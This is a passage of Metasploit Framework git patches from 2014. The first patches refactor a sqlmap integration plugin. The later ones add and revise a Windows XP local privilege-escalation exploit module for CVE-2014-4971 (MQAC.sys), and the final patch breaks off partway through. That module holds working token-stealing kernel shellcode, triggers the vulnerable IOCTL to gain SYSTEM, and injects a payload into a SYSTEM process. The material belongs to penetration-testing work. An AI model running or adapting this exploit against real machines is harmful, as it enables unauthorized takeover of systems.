-        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
 
         print_line
-        print_status("URL: " + @tasks[args[0]]['url'])
+        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
 
-        res = @manager.get_task_data(args[0])
+        res = @manager.get_task_data(@hid_tasks[args[0]])
 
         tbl = Rex::Ui::Text::Table.new(
           'Columns' => ['Title','Payload'])
@@ -169,32 +169,33 @@ module Msf
       end
 
       def cmd_sqlmap_save_data(*args)
-        if args.length != 1
+        unless args.length == 1
           print_error("Usage:")
           print_error("\tsqlmap_save_data <taskid>")
           return
         end
 
-        if !(framework.db && framework.db.usable)
+        unless framework.db && framework.db.usable
           print_error("No database is connected or usable")
           return
         end
 
-        @tasks = {} if !@tasks
+        @hid_tasks ||= {}
+        @tasks ||= {}
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
-        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
 
         print_line
-        print_status("URL: " + @tasks[args[0]]['url'])
+        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
 
-        res = @manager.get_task_data(args[0])
+        res = @manager.get_task_data(@hid_tasks[args[0]])
         web_vuln_info = {}
-        url = @tasks[args[0]]['url']
+        url = @tasks[@hid_tasks[args[0]]]['url']
         proto = url.split(":")[0]
         host = url.split("/")[2]
         port = 80
@@ -222,44 +223,54 @@ module Msf
             end
           end
         end
-        print_good("Saved vulnerabilities to database.")    
+        print_good("Saved vulnerabilities to database.")
       end
 
       def cmd_sqlmap_get_option(*args)
-        @tasks = {} if !@tasks
-        if args.length != 2
+        @hid_tasks ||= {}
+        @tasks ||= {}
+
+        unless args.length == 2
           print_error("Usage:")
           print_error("\tsqlmap_get_option <taskid> <option_name>")
         end
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
-        task_options = @manager.get_options(args[0])
-        @tasks[args[0]] = task_options["options"]
-        print_good(args[1] + ": " + @tasks[args[0]][args[1]].to_s)
+        task_options = @manager.get_options(@hid_tasks[args[0]])
+        @tasks[@hid_tasks[args[0]]] = task_options["options"]
+
+        if @tasks[@hid_tasks[args[0]]]
+          print_good(args[1] + ": " + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
+        else
+          print_error("Option " + args[0] + " doesn't exist")
+        end
       end
 
       def cmd_sqlmap_new_task(*args)
-        @tasks = {} if !@tasks
+        @hid_tasks ||= {}
+        @tasks ||= {}
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
         taskid = @manager.new_task['taskid']
+        @hid_tasks[(@hid_tasks.length+1).to_s] = taskid
         task_options = @manager.get_options(taskid)
-        @tasks[taskid] = task_options["options"]
-        print_good("Created task: " + taskid)
+        @tasks[@hid_tasks[@hid_tasks.length]] = task_options["options"]
+        print_good("Created task: " + @hid_tasks.length.to_s)
       end
 
       def cmd_sqlmap_list_tasks(*args)
-        @tasks = {} if !@tasks
-        @tasks.each do |task, options|
-          print_good("Task ID: " + task)
+        @hid_tasks ||= {}
+        @tasks ||= {}
+        @hid_tasks.each do |task, options|
+          print_good("Task ID: " + task.to_s)
         end
       end
     end

From 1a157ff80390f3116d0b443e3859a3c7c1d745f0 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Mon, 21 Jul 2014 18:00:03 -0500
Subject: [PATCH 139/321] Change all the " to ' when not interpolating

---
 plugins/sqlmap.rb | 148 +++++++++++++++++++++++-----------------------
 1 file changed, 74 insertions(+), 74 deletions(-)

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index c5985a5432..90a9e207f8 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -13,22 +13,22 @@ module Msf
 
       def commands
         {
-          "sqlmap_new_task" => "It's a task!",
-          "sqlmap_connect" => "sqlmap_connect <host> [<port>]",
-          "sqlmap_list_tasks" => "List the knows tasks. Not stored in a DB, so lives as long as the console does",
-          "sqlmap_get_option" => "Get an option for a task",
-          "sqlmap_set_option" => "Set an option for a task",
-          "sqlmap_start_task" => "Start the task",
-          "sqlmap_get_status" => "Get the status of a task",
-          "sqlmap_get_log" => "Get the running log of a task",
-          "sqlmap_get_data" => "Get the resulting data of the task",
-          "sqlmap_save_data" => "Save the resulting data as web_vulns"
+          'sqlmap_new_task' => 'It\'s a task!',
+          'sqlmap_connect' => 'sqlmap_connect <host> [<port>]',
+          'sqlmap_list_tasks' => 'List the knows tasks. Not stored in a DB, so lives as long as the console does',
+          'sqlmap_get_option' => 'Get an option for a task',
+          'sqlmap_set_option' => 'Set an option for a task',
+          'sqlmap_start_task' => 'Start the task',
+          'sqlmap_get_status' => 'Get the status of a task',
+          'sqlmap_get_log' => 'Get the running log of a task',
+          'sqlmap_get_data' => 'Get the resulting data of the task',
+          'sqlmap_save_data' => 'Save the resulting data as web_vulns'
         }
       end
 
       def cmd_sqlmap_connect(*args)
         if args.length == 0
-          print_error("Need a host, and optionally a port")
+          print_error('Need a host, and optionally a port')
           return
         end
 
@@ -41,18 +41,18 @@ module Msf
           @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host, port))
         end
 
-        print_good("Set connection settings for host " + host + (port ? " on port " + port : ""))
+        print_good('Set connection settings for host ' + host + (port ? ' on port ' + port : ''))
       end
 
       def cmd_sqlmap_set_option(*args)
         unless args.length == 3
-          print_error("Usage:")
-          print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
+          print_error('Usage:')
+          print_error('\tsqlmap_set_option <taskid> <option_name> <option_value>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
@@ -62,13 +62,13 @@ module Msf
         end
 
         res = @manager.set_option(@hid_tasks[args[0]], args[1], val)
-        print_status("Success: " + res["success"].to_s)
+        print_status('Success: ' + res['success'].to_s)
       end
 
       def cmd_sqlmap_start_task(*args)
         if args.length == 0
-          print_error("Usage:")
-          print_error("\tsqlmap_start_task <taskid> [<url>]")
+          print_error('Usage:')
+          print_error('\tsqlmap_start_task <taskid> [<url>]')
           return
         end
 
@@ -79,59 +79,59 @@ module Msf
         end
 
         if !options['url'] && @tasks[@hid_tasks[args[0]]]['url'] == ''
-          print_error("You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option")
+          print_error('You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.start_task(@hid_tasks[args[0]], options)
-        print_status("Started task: " + res["success"].to_s)
+        print_status('Started task: ' + res['success'].to_s)
       end
 
       def cmd_sqlmap_get_log(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_log <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_log <taskid>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.get_task_log(@hid_tasks[args[0]])
 
-        res["log"].each do |message|
+        res['log'].each do |message|
           print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
         end
       end
 
       def cmd_sqlmap_get_status(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_status <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_status <taskid>')
           return
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         res = @manager.get_task_status(@hid_tasks[args[0]])
 
-        print_status("Status: " + res['status'])
+        print_status('Status: ' + res['status'])
       end
 
       def cmd_sqlmap_get_data(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_get_data <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_data <taskid>')
           return
         end
 
@@ -139,25 +139,25 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
-        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])['options']
 
         print_line
-        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
+        print_status('URL: ' + @tasks[@hid_tasks[args[0]]]['url'])
 
         res = @manager.get_task_data(@hid_tasks[args[0]])
 
         tbl = Rex::Ui::Text::Table.new(
           'Columns' => ['Title','Payload'])
 
-        res["data"].each do |d|
-          d["value"].each do |v|
-            v["data"].each do |i|
-              title = i[1]["title"].split('-')[0]
-              payload = i[1]["payload"]
+        res['data'].each do |d|
+          d['value'].each do |v|
+            v['data'].each do |i|
+              title = i[1]['title'].split('-')[0]
+              payload = i[1]['payload']
               tbl << [title, payload]
             end
           end
@@ -170,13 +170,13 @@ module Msf
 
       def cmd_sqlmap_save_data(*args)
         unless args.length == 1
-          print_error("Usage:")
-          print_error("\tsqlmap_save_data <taskid>")
+          print_error('Usage:')
+          print_error('\tsqlmap_save_data <taskid>')
           return
         end
 
         unless framework.db && framework.db.usable
-          print_error("No database is connected or usable")
+          print_error('No database is connected or usable')
           return
         end
 
@@ -184,46 +184,46 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
-        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])["options"]
+        @tasks[@hid_tasks[args[0]]] = @manager.get_options(@hid_tasks[args[0]])['options']
 
         print_line
-        print_status("URL: " + @tasks[@hid_tasks[args[0]]]['url'])
+        print_status('URL: ' + @tasks[@hid_tasks[args[0]]]['url'])
 
         res = @manager.get_task_data(@hid_tasks[args[0]])
         web_vuln_info = {}
         url = @tasks[@hid_tasks[args[0]]]['url']
-        proto = url.split(":")[0]
-        host = url.split("/")[2]
+        proto = url.split(':')[0]
+        host = url.split('/')[2]
         port = 80
-        port = host.split(":")[1] if host.index(":")
-        host = host.split(":")[0] if host.index(":")
-        path = '/' + (url.split("/")[3..(url.split("/").length - 1)].join('/'))
-        query = url.split("?")[1]
+        port = host.split(':')[1] if host.index(':')
+        host = host.split(':')[0] if host.index(':')
+        path = '/' + (url.split('/')[3..(url.split('/').length - 1)].join('/'))
+        query = url.split('?')[1]
         web_vuln_info[:web_site] = url
         web_vuln_info[:path] = path
         web_vuln_info[:query] = query
         web_vuln_info[:host] = host
         web_vuln_info[:port] = port
         web_vuln_info[:ssl] = (proto =~ /https/)
-        web_vuln_info[:category] = "imported from sqlmap"
-        res["data"].each do |d|
-          d["value"].each do |v|
-            web_vuln_info[:pname] = v["parameter"]
-            web_vuln_info[:method] = v["place"]
-            web_vuln_info[:payload] = v["suffix"]
-            v["data"].each do |k,i|
-              web_vuln_info[:name] = i["title"]
+        web_vuln_info[:category] = 'imported from sqlmap'
+        res['data'].each do |d|
+          d['value'].each do |v|
+            web_vuln_info[:pname] = v['parameter']
+            web_vuln_info[:method] = v['place']
+            web_vuln_info[:payload] = v['suffix']
+            v['data'].each do |k,i|
+              web_vuln_info[:name] = i['title']
               web_vuln_info[:description] = res.to_json
-              web_vuln_info[:proof] = i["payload"]
+              web_vuln_info[:proof] = i['payload']
               framework.db.report_web_vuln(web_vuln_info)
             end
           end
         end
-        print_good("Saved vulnerabilities to database.")
+        print_good('Saved vulnerabilities to database.')
       end
 
       def cmd_sqlmap_get_option(*args)
@@ -231,22 +231,22 @@ module Msf
         @tasks ||= {}
 
         unless args.length == 2
-          print_error("Usage:")
-          print_error("\tsqlmap_get_option <taskid> <option_name>")
+          print_error('Usage:')
+          print_error('\tsqlmap_get_option <taskid> <option_name>')
         end
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         task_options = @manager.get_options(@hid_tasks[args[0]])
-        @tasks[@hid_tasks[args[0]]] = task_options["options"]
+        @tasks[@hid_tasks[args[0]]] = task_options['options']
 
         if @tasks[@hid_tasks[args[0]]]
-          print_good(args[1] + ": " + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
+          print_good(args[1] + ': ' + @tasks[@hid_tasks[args[0]]][args[1]].to_s)
         else
-          print_error("Option " + args[0] + " doesn't exist")
+          print_error('Option ' + args[0] + ' doesn\'t exist')
         end
       end
 
@@ -255,22 +255,22 @@ module Msf
         @tasks ||= {}
 
         unless @manager
-          print_error("Please run sqlmap_connect <host> first.")
+          print_error('Please run sqlmap_connect <host> first.')
           return
         end
 
         taskid = @manager.new_task['taskid']
         @hid_tasks[(@hid_tasks.length+1).to_s] = taskid
         task_options = @manager.get_options(taskid)
-        @tasks[@hid_tasks[@hid_tasks.length]] = task_options["options"]
-        print_good("Created task: " + @hid_tasks.length.to_s)
+        @tasks[@hid_tasks[@hid_tasks.length]] = task_options['options']
+        print_good('Created task: ' + @hid_tasks.length.to_s)
       end
 
       def cmd_sqlmap_list_tasks(*args)
         @hid_tasks ||= {}
         @tasks ||= {}
         @hid_tasks.each do |task, options|
-          print_good("Task ID: " + task.to_s)
+          print_good('Task ID: ' + task.to_s)
         end
       end
     end
@@ -280,7 +280,7 @@ module Msf
 
       add_console_dispatcher(SqlmapCommandDispatcher)
 
-      print_status("Sqlmap plugin loaded")
+      print_status('Sqlmap plugin loaded')
     end
 
     def cleanup
@@ -288,11 +288,11 @@ module Msf
     end
 
     def name
-      "Sqlmap"
+      'Sqlmap'
     end
 
     def desc
-      "Use Sqlmap, yo!"
+      'Use Sqlmap, yo!'
     end
   end
 end

From d62b24744c63c55ec18a1b4b3275171cbb97a8b1 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Mon, 21 Jul 2014 18:04:36 -0500
Subject: [PATCH 140/321] Moar " -> '

---
 lib/sqlmap/sqlmap_manager.rb | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/lib/sqlmap/sqlmap_manager.rb b/lib/sqlmap/sqlmap_manager.rb
index 86e9f4eac6..cbb69c3b80 100644
--- a/lib/sqlmap/sqlmap_manager.rb
+++ b/lib/sqlmap/sqlmap_manager.rb
@@ -7,43 +7,43 @@ module Sqlmap
     end
 
     def new_task
-      res = @session.get("/task/new")
+      res = @session.get('/task/new')
       return JSON.parse(res.body)
     end
 
     def delete_task(task_id)
-      res = @session.get("/task/" + task_id + "/delete")
+      res = @session.get('/task/' + task_id + '/delete')
       return JSON.parse(res.body)
     end
 
     def set_option(task_id, key, value)
       post = { key => value }
-      res = @session.post("/option/" + task_id + "/set", nil, post.to_json, {'ctype' => 'application/json'})
+      res = @session.post('/option/' + task_id + '/set', nil, post.to_json, {'ctype' => 'application/json'})
       return JSON.parse(res.body)
     end
 
     def get_options(task_id)
-      res = @session.get("/option/" + task_id + "/list")
+      res = @session.get('/option/' + task_id + '/list')
       return JSON.parse(res.body)
     end
 
     def start_task(task_id, options = {})
-      res = @session.post("/scan/" + task_id + "/start" , nil, options.to_json, {'ctype' => 'application/json'})
+      res = @session.post('/scan/' + task_id + '/start' , nil, options.to_json, {'ctype' => 'application/json'})
       return JSON.parse(res.body)
     end
 
     def get_task_status(task_id)
-      res = @session.get("/scan/" + task_id + "/status")
+      res = @session.get('/scan/' + task_id + '/status')
       return JSON.parse(res.body)
     end
 
     def get_task_log(task_id)
-      res = @session.get("/scan/" + task_id + "/log")
+      res = @session.get('/scan/' + task_id + '/log')
       return JSON.parse(res.body)
     end
 
     def get_task_data(task_id)
-      res = @session.get("/scan/" + task_id + "/data")
+      res = @session.get('/scan/' + task_id + '/data')
       return JSON.parse(res.body)
     end
   end

From ef12a632f6d174e467421f25e2cd8fce76332972 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 22 Jul 2014 08:20:32 -0500
Subject: [PATCH 141/321] Change filename

---
 spec/lib/msf/http/{typo3.rb => typo3_spec.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename spec/lib/msf/http/{typo3.rb => typo3_spec.rb} (100%)

diff --git a/spec/lib/msf/http/typo3.rb b/spec/lib/msf/http/typo3_spec.rb
similarity index 100%
rename from spec/lib/msf/http/typo3.rb
rename to spec/lib/msf/http/typo3_spec.rb

From da4eb0e08f3964b7f371939a55957b2b435a0392 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 10:04:12 -0400
Subject: [PATCH 142/321] First commit of MQAC arbitrary write priv escalation

---
 modules/exploits/windows/local/mqac_write.rb | 192 +++++++++++++++++++
 1 file changed, 192 insertions(+)
 create mode 100644 modules/exploits/windows/local/mqac_write.rb

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
new file mode 100644
index 0000000000..a4b7e4e2b8
--- /dev/null
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'MQAC.sys Arbitrary Write Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within the MQAC module allows an attacker to inject
+        memory they control into an arbitrary location they define.
+
+        This module will elevate itself to SYSTEM, then inject the payload
+        into another SYSTEM process before restoring it's own token to
+        avoid causing system instability.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin', # original exploit and all the hard work
+          'Spencer McIntyre' # MSF module
+        ],
+      'Arch'          => [ ARCH_X86 ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          [ 'Windows XP SP3',
+            {
+              'HaliQuerySystemInfo' => 0x16bba,
+              'HalpSetSystemInformation' => 0x19436,
+              '_KPROCESS' => "\x44",
+              '_TOKEN' => "\xc8",
+              '_UPID' => "\x84",
+              '_APLINKS' => "\x88"
+            }
+          ],
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2014-4971' ],
+          [ 'EDB', '34112' ],
+        ],
+      'DisclosureDate'=> 'Jul 22 2014',
+      'DefaultTarget' => 0
+    }))
+  end
+
+  def find_sys_base(drvname)
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+        return [address, current_drvname]
+      end
+    end
+  end
+
+  # Function borrowed from smart_hashdump
+  def get_system_proc
+    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
+    local_sys = resolve_sid("S-1-5-18")
+    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
+
+    # Processes that can Blue Screen a host if migrated in to
+    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    session.sys.process.processes.each do |p|
+      # Check we are not migrating to a process that can BSOD the host
+      next if dangerous_processes.include?(p["name"])
+      next if p["pid"] == session.sys.process.getpid
+      next if p["pid"] == 4
+      next if p["user"] != system_account_name
+      return p
+    end
+  end
+
+  def exploit
+    if sysinfo["Architecture"] =~ /wow64/i
+      print_error("Running against WOW64 is not supported")
+      return
+    elsif sysinfo["Architectore"] =~ /x64/
+      print_error("Running against 64-bit systems is not supported")
+      return
+    end
+
+    if is_system?
+      print_error("This meterpreter session is already running as SYSTEM")
+      return
+    end
+
+    this_proc = session.sys.process.open
+    kernel_info = find_sys_base(nil)
+    base_addr = 0xffff
+    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
+
+    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    if handle['return'] == 0
+      print_error('Failed to open the \\.\MQAC device')
+      return
+    end
+    handle = handle['return']
+
+    if not this_proc.memory.writable?(base_addr)
+      result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+    end
+    if not this_proc.memory.writable?(base_addr)
+      print_error('Failed to properly allocate memory')
+      return
+    end
+
+    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    hKernel = hKernel['return']
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    halDispatchTable = halDispatchTable['return']
+    halDispatchTable -= hKernel
+    halDispatchTable += kernel_info[0]
+    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+
+    halbase = find_sys_base("hal.dll")[0]
+    haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
+    halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
+    print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
+    print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
+
+    tokenstealing =  "\x52"
+    tokenstealing << "\x53"
+    tokenstealing << "\x33\xc0"
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
+    tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
+    tokenstealing << "\x8b\xc8"
+    tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x89\x1d\x00\x09\x02\x00"
+    tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
+    tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
+    tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
+    tokenstealing << "\x75\xe8"
+    tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x8b\xc1"
+    tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x5b"
+    tokenstealing << "\x5a"
+    tokenstealing << "\xc2\x10"
+
+    shellcode = make_nops(0x200) + restore_ptrs + tokenstealing
+    this_proc.memory.write(0x1, shellcode)
+
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
+    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+
+    if not is_system?
+      print_error("Exploit failed")
+      return
+    end
+
+    begin
+      proc = get_system_proc
+      print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}")
+      host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS)
+      mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024))
+
+      print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}")
+      host_process.memory.write(mem, payload.encoded)
+      host_process.thread.create(mem, 0)
+    rescue ::Exception => e
+      print_error("Failed to Inject Payload")
+      print_error(e.to_s)
+    end
+  end
+
+end

From 6a545c26423d7da4b9426c723944c290a5508d52 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 10:39:34 -0400
Subject: [PATCH 143/321] Clean up the mqac escalation module

---
 modules/exploits/windows/local/mqac_write.rb | 26 +++++++++-----------
 1 file changed, 11 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index a4b7e4e2b8..ebfabd34fa 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -138,34 +138,30 @@ class Metasploit3 < Msf::Exploit::Local
     halDispatchTable += kernel_info[0]
     print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
 
-    halbase = find_sys_base("hal.dll")[0]
-    haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
-    halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
-    print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
-    print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
-
-    tokenstealing =  "\x52"
+    tokenstealing  = "\x31\xc0"
+    tokenstealing << "\x52"
     tokenstealing << "\x53"
     tokenstealing << "\x33\xc0"
     tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
-    tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
+    tokenstealing << "\x8b\x40" + target['_KPROCESS']
     tokenstealing << "\x8b\xc8"
-    tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
     tokenstealing << "\x89\x1d\x00\x09\x02\x00"
-    tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
+    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
+    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
+    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
     tokenstealing << "\x75\xe8"
-    tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
     tokenstealing << "\x8b\xc1"
-    tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
+    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
     tokenstealing << "\x5b"
     tokenstealing << "\x5a"
     tokenstealing << "\xc2\x10"
 
-    shellcode = make_nops(0x200) + restore_ptrs + tokenstealing
+    shellcode = make_nops(0x200) + tokenstealing
     this_proc.memory.write(0x1, shellcode)
 
+    print_status("Triggering vulnerable IOCTL")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 

From ca0dcf23b0d123a147f1a0fba208e696476e268e Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 10:54:10 -0400
Subject: [PATCH 144/321] Add a simple check method for cve-2014-4971

---
 modules/exploits/windows/local/mqac_write.rb | 54 ++++++++++++++------
 1 file changed, 38 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index ebfabd34fa..c73b9ede1d 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -13,14 +13,13 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info, {
-      'Name'          => 'MQAC.sys Arbitrary Write Privilege Escalation',
+      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
       'Description'    => %q{
-        A vulnerability within the MQAC module allows an attacker to inject
-        memory they control into an arbitrary location they define.
+        A vulnerability within the MQAC.sys module allows an attacker to
+        overwrite an arbitrary location in kernel memory.
 
         This module will elevate itself to SYSTEM, then inject the payload
-        into another SYSTEM process before restoring it's own token to
-        avoid causing system instability.
+        into another SYSTEM process.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -28,14 +27,14 @@ class Metasploit3 < Msf::Exploit::Local
           'Matt Bergin', # original exploit and all the hard work
           'Spencer McIntyre' # MSF module
         ],
-      'Arch'          => [ ARCH_X86 ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
+      'Arch'           => [ ARCH_X86 ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'   => 'thread',
         },
-      'Targets'       =>
+      'Targets'        =>
         [
           [ 'Windows XP SP3',
             {
@@ -96,6 +95,33 @@ class Metasploit3 < Msf::Exploit::Local
     end
   end
 
+  def open_device
